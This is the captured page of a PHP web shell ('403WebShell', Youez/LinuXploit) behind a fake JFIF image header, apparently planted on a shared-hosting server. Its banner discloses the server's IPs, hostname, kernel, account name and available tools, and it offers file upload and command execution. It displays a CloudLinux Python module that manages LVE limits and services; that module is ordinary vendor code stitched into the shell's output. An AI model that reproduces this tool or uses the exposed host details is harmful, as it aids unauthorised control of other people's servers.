????JFIF??x?x????'403WebShell
403Webshell
Server IP : 104.21.30.238  /  Your IP : 216.73.216.145
Web Server : LiteSpeed
System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
User : tempvsty ( 647)
PHP Version : 8.0.30
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /././opt/cloudlinux/venv/lib/python3.11/site-packages/clconfigure/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /././opt/cloudlinux/venv/lib/python3.11/site-packages/clconfigure//limits.py
# Copyright © Cloud Linux GmbH & Cloud Linux Software, Inc 2010-2018 All Rights Reserved
#
# Licensed under CLOUD LINUX LICENSE AGREEMENT
# https://cloudlinux.com/docs/LICENCE.TXT
#
import logging
import pathlib

from clconfigure import run, task
from clconfigure.packages import install_package
from clconfigure.services import (
    STATE_FAILED,
    STATE_MASKED,
    STATE_RUNNING,
    STATE_STOPPED,
    STATE_UNMASKED,
    STATE_ENABLED,
    STATE_DISABLED,
    get_service_state,
    set_service_state
)


def initialize_lvestats():
    # NOTE(vlebedev): We need to trigger 'lve-stats' scriptlets to properly initialized it's database stuff.
    install_package('lve-stats', reinstall=True)
    enable_lve_services()


@task("Changing default limits state to '{desired_state}'")
def set_default_limits_state(desired_state):
    """
    Brings default limits to given state (unlimited | default).
    May be executed more that once, does't crash on future calls
    """
    if desired_state == 'unlimited':
        run(['lvectl', 'set', 'default', '--unlimited'])
    else:
        raise RuntimeError('Another states temporary unavailable')


def disable_lve_services():
    """
    Turn off all lve-related services.
    """
    for state in [STATE_STOPPED, STATE_DISABLED, STATE_MASKED]:
        for service in ['lve', 'lve_namespaces', 'lvestats', 'lvectl']:
            set_service_state(state, service)


def enable_lve_services():
    """
    Turn on all lve-related services.
    """
    for state in [STATE_UNMASKED, STATE_RUNNING, STATE_ENABLED]:
        for service in ['lve', 'lve_namespaces', 'lvestats', 'lvectl']:
            set_service_state(state, service)


@task("Unloading lve module")
def unload_lve_module():
    """
    Restart services that still use lve device and unload lve module then
    """
    if not pathlib.Path('/dev/lve').exists():
        # already unloaded
        return

    # Check if lve device is held by any process
    res = run(['lsof', '/dev/lve'])
    res_stdout_lines = res.stdout.split() if res.stdout is not None else []

    services = [
        service for service in ['mysqld', 'mysql', 'mariadb', 'httpd', 'apache2']
        if any(line.startswith(service) for line in res_stdout_lines)
    ]

    if services:
        run(['systemctl', 'restart', *services])

    res = run(['modprobe', '-rf', 'kmodlve'])
    if pathlib.Path('/sys/module/kmodlve').exists():
        logging.warning('Failed to unload the lve module. Please reboot the server.')


def apply_workaround_lve_failed():
    """
    Apply workaround for the case
    When `systemctl stop lve` makes it transition to "failed" state instead of "inactive"
    """
    if get_service_state('lve') != STATE_FAILED:
        return
    set_service_state(STATE_UNMASKED, 'lve')
    set_service_state(STATE_RUNNING, 'lve')
    set_service_state(STATE_STOPPED, 'lve')
    set_service_state(STATE_MASKED, 'lve')

Youez - 2016 - github.com/yon3zu
LinuXploit